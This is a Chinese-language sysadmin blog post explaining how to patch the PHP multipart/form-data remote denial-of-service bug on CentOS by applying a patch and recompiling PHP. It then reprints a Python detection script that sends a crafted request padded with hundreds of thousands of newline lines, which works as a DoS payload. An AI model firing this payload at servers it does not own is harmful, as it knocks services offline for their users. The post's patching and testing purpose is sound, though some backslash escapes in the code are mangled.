今天在烏云上看到PHP multipart/form-data 遠程DOS漏洞,馬上給同事聯系了下對線上服務器進行打補丁,先給一個centos編譯安裝nginx+php-fpm+mysql的教程,如果是根據我這樣安裝的話,那你們可以繼續按照做下去了,如果不是的話,那么你們就看看吧.
系統:centos 5.x(64位)
需要的軟件:php-5.2-multipart-form-data.patch
1.查看自己php版本
- php -v
- PHP 5.2.17p1 (cli) (built: Oct 29 2015 15:31:06)
- Copyright (c) 1997-2010 The PHP Group
- Zend Engine v2.2.0, Copyright (c) 1998-2010 Zend Technologies
如果版本高于5.3的話,那就直接升級php就可以了.
2.下載補丁文件
- wget http://soft.vpser.net/web/php/bug/php-5.2-multipart-form-data.patch
- //或
- wget/php_patch/php-5.2-multipart-form-data.patch
3.安裝補丁
- 5.2:
- cp php-5.2-multipart-form-data.patch ~/install/php-5.2.17/
- cd php-5.2.17
- patch -p1 < php-5.2-multipart-form-data.patch
- 5.3:
- wget http://soft.vpser.net/web/php/bug/php-5.3-multipart-form-data.patch
- patch -p1 < php-5.3-multipart-form-data.patch
將42行到45行刪除:
- if [ “$php_version” == “$old_php_version” ]; then
- echo “Error: The upgrade PHP Version is the same as the old Version!!”
- exit 1
- fi
4.重新對php進行編譯
- ./configure --prefix=/usr/local/php --enable-fastcgi --enable-fpm --with-fpm-log=/var/log/php-fpm.log /
- --with-fpm-conf=/etc/php-fpm.conf --with-fpm-pid=/var/run/php-fpm.pid --with-config-file-path=/etc /
- --with-config-file-scan-dir=/etc/php.d --with-openssl --with-zlib --enable-bcmath --with-bz2 --with-curl /
- --enable-ftp --with-gd --enable-gd-native-ttf --with-jpeg-dir --with-png-dir --with-gettext --with-mhash /
- --enable-mbstring --with-mcrypt --enable-soap --enable-zip --with-iconv=/usr/local/libiconv /
- --with-mysql=/usr/local/mysql --with-mysqli=/usr/local/mysql/bin/mysql_config --without-pear
PS:你們最好自己查看下自己php的編譯參數,php -i|grep configure
make && make install
好了,這樣就把漏洞整好了,怎么檢測呢?請看下面這個腳本:
- cat dd.py
- '''
- Author: Shusheng Liu,The Department of Security Cloud, Baidu
- email: liusscs@163.com
- '''
- import sys
- import urllib,urllib2
- import datetime
- from optparse import OptionParser
- def http_proxy(proxy_url):
- proxy_handler = urllib2.ProxyHandler({"http" : proxy_url})
- null_proxy_handler = urllib2.ProxyHandler({})
- opener = urllib2.build_opener(proxy_handler)
- urllib2.install_opener(opener)
- #end http_proxy
- def check_php_multipartform_dos(url,post_body,headers):
- req = urllib2.Request(url)
- for key in headers.keys():
- req.add_header(key,headers[key])
- starttime = datetime.datetime.now();
- fd = urllib2.urlopen(req,post_body)
- html = fd.read()
- endtime = datetime.datetime.now()
- usetime=(endtime - starttime).seconds
- if(usetime > 5):
- result = url+" is vulnerable";
- else:
- if(usetime > 3):
- result = "need to check normal respond time"
- return [result,usetime]
- #end
- def main():
- #http_proxy("http://127.0.0.1:8089")
- parser = OptionParser()
- parser.add_option("-t", "--target", action="store",
- dest="target",
- default=False,
- type="string",
- help="test target")
- (options, args) = parser.parse_args()
- if(options.target):
- target = options.target
- else:
- return;
- Num=650000
- headers={'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryX3B7rDMPcQlzmJE1',
- 'Accept-Encoding':'gzip, deflate',
- 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36'}
- body = "------WebKitFormBoundaryX3B7rDMPcQlzmJE1/nContent-Disposition: form-data; name=/"file/"; filename=sp.jpg"
- payload=""
- for i in range(0,Num):
- payload = payload + "a/n"
- body = body + payload;
- body = body + "Content-Type: application/octet-stream/r/n/r/ndatadata/r/n------WebKitFormBoundaryX3B7rDMPcQlzmJE1--"
- print "starting...";
- respond=check_php_multipartform_dos(target,body,headers)
- print "Result : "
- print respond[0]
- print "Respond time : "+str(respond[1]) + " seconds";
- if __name__=="__main__":
- main()
新聞熱點
疑難解答
